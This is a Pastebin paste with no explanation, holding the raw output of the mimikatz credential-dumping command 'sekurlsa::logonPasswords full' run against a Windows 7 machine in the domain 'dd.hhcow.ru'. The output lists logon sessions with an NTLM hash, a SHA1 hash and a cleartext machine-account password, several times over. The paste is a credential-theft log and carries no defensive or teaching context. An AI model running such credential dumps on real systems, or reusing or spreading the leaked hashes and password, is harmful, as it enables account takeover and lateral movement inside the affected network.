Advertisement
Guest User

Untitled

a guest
Jul 15th, 2018
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
  1. mimikatz # sekurlsa::logonPasswords full
  2.  
  3. Authentication Id : 0 ; 997 (00000000:000003e5)
  4. Session : Service from 0
  5. User Name : LOCAL SERVICE
  6. Domain : NT AUTHORITY
  7. Logon Server : (null)
  8. Logon Time : 7/15/2018 1:10:45 PM
  9. SID : S-1-5-19
  10. msv :
  11. tspkg :
  12. wdigest :
  13. * Username : (null)
  14. * Domain : (null)
  15. * Password : (null)
  16. kerberos :
  17. * Username : (null)
  18. * Domain : (null)
  19. * Password : (null)
  20. ssp :
  21. credman :
  22.  
  23. Authentication Id : 0 ; 996 (00000000:000003e4)
  24. Session : Service from 0
  25. User Name : WS1562NNNWIN7$
  26. Domain : DD
  27. Logon Server : (null)
  28. Logon Time : 7/15/2018 1:10:44 PM
  29. SID : S-1-5-20
  30. msv :
  31. [00000003] Primary
  32. * Username : WS1562NNNWIN7$
  33. * Domain : DD
  34. * NTLM : c43c7f53d5a8b558fde2927d0cfa2436
  35. * SHA1 : e72850d01628a4ebb763cc947de7a5e334fe779f
  36. tspkg :
  37. wdigest :
  38. * Username : WS1562NNNWIN7$
  39. * Domain : DD
  40. * Password : 2%wFfHuh'(V9CDuUGg0suIcItrVj"TEU,N+xw/a"PC]X/D\M"iByvF=.. NKlrR=:7`ZqAx&I"!vh ,^C8ibma?%3Jictdq&hf6>aPJ@w"g"o#jB%0b`qtYx
  41. kerberos :
  42. * Username : ws1562nnnwin7$
  43. * Domain : dd.hhcow.ru
  44. * Password : 2%wFfHuh'(V9CDuUGg0suIcItrVj"TEU,N+xw/a"PC]X/D\M"iByvF=.. NKlrR=:7`ZqAx&I"!vh ,^C8ibma?%3Jictdq&hf6>aPJ@w"g"o#jB%0b`qtYx
  45. ssp :
  46. credman :
  47.  
  48. Authentication Id : 0 ; 23975 (00000000:00005da7)
  49. Session : UndefinedLogonType from 0
  50. User Name : (null)
  51. Domain : (null)
  52. Logon Server : (null)
  53. Logon Time : 7/15/2018 1:10:43 PM
  54. SID :
  55. msv :
  56. [00000003] Primary
  57. * Username : WS1562NNNWIN7$
  58. * Domain : DD
  59. * NTLM : c43c7f53d5a8b558fde2927d0cfa2436
  60. * SHA1 : e72850d01628a4ebb763cc947de7a5e334fe779f
  61. tspkg :
  62. wdigest :
  63. kerberos :
  64. ssp :
  65. credman :
  66.  
  67. Authentication Id : 0 ; 999 (00000000:000003e7)
  68. Session : UndefinedLogonType from 0
  69. User Name : WS1562NNNWIN7$
  70. Domain : DD
  71. Logon Server : (null)
  72. Logon Time : 7/15/2018 1:10:43 PM
  73. SID : S-1-5-18
  74. msv :
  75. tspkg :
  76. wdigest :
  77. * Username : WS1562NNNWIN7$
  78. * Domain : DD
  79. * Password : 2%wFfHuh'(V9CDuUGg0suIcItrVj"TEU,N+xw/a"PC]X/D\M"iByvF=.. NKlrR=:7`ZqAx&I"!vh ,^C8ibma?%3Jictdq&hf6>aPJ@w"g"o#jB%0b`qtYx
  80. kerberos :
  81. * Username : ws1562nnnwin7$
  82. * Domain : DD.HHCOW.RU
  83. * Password : 2%wFfHuh'(V9CDuUGg0suIcItrVj"TEU,N+xw/a"PC]X/D\M"iByvF=.. NKlrR=:7`ZqAx&I"!vh ,^C8ibma?%3Jictdq&hf6>aPJ@w"g"o#jB%0b`qtYx
  84. ssp :
  85. credman :
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement